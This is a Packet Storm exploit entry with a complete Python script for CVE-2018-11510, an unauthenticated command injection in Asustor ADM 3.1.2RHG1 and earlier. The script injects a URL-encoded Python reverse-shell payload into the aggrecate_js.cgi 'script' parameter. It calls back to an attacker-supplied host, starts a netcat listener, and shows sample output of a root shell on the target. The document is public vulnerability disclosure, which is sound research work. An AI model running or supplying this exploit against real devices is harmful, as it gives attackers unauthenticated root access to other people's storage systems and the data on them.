ADM 3.1.2RHG1 Remote Code Execution

2018-08-17T00:00:00
ID PACKETSTORM:148959
Type packetstorm
Reporter Kyle Lovett
Modified 2018-08-17T00:00:00

Description

                                        
                                            `# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution  
# Author: Matthew Fulton & Kyle Lovett  
# Date: 2018-07-01  
# Vendor Homepage: https://www.asustor.com/  
# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img  
# Version: <= ADM 3.1.2RHG1  
# Tested on: ASUSTOR AS6202T  
# CVE : CVE-2018-11510  
# References:   
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510  
  
#!/usr/bin/python  
  
"""  
CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510  
This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette   
if exploitation occurs successfully, a root shell is granted   
Authors: matthew fulton and Kyle Lovett  
Date: 27 May 2018  
Background: Both Kyle and I found a number of vulnerabilities that we had independently reported  
to Asustor that Asustor hasn't acknowledge nor apparenlty fixed.   
After a twitter communication Kyle was kind enough to share a few details  
exploit created on MacOS system, python 2.7.10, may port to metasploit module soon  
Vendor link: https://www.asustor.com  
  
Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82  
exploit for an unauthenticated OS command injection vulnerability that effects  
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise  
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)  
starting netcat listener on port 1234  
/bin/sh: can't access tty; job control turned off  
/volume0/usr/builtin/webman/portal/apis # uname -a;id  
/bin/sh: can't access tty; job control turned off  
/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux  
uid=0(root) gid=0(root) groups=0(root)  
"""  
  
import sys, threading, time, os, subprocess  
import urllib2  
import ssl  
import argparse  
  
  
class exploit(object):  
def __init__(self,interval=1):  
self.target = args.target  
self.rport = args.port  
self.lport = args.lport  
self.remote = args.remote  
self.interval = interval  
thread = threading.Thread(target=self.run, args=())  
thread.daemon = True  
thread.start()  
  
def run(self):  
#ignore ssl warnings  
ctx = ssl.create_default_context()  
ctx.check_hostname = False  
ctx.verify_mode = ssl.CERT_NONE   
while True:  
try:  
turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \  
"launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \  
"(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \  
"%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \  
"subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"  
response=urllib2.urlopen(turl,context=ctx)  
time.sleep(self.interval)  
except urllib2.URLError as e:  
print "Something is wrong:|"  
print e  
os._exit(1)  
  
def revShell():  
print "starting netcat listener on port "+args.lport  
cmd = "nc -lv {0}".format(args.lport)  
os.system(cmd)  
  
def main():  
print """exploit for an unauthenticated OS command injection vulnerability that effects   
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise  
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""  
goexploit = exploit()  
revShell()  
  
if __name__ == '__main__':  
Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise  
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""  
parser=argparse.ArgumentParser(description=help)  
parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)  
parser.add_argument('--port', '-p', default="8001")  
parser.add_argument('--lport', '-l', default="1234")  
parser.add_argument('--remote','-r', default="192.168.1.253")  
args = parser.parse_args()  
main()  
  
  
`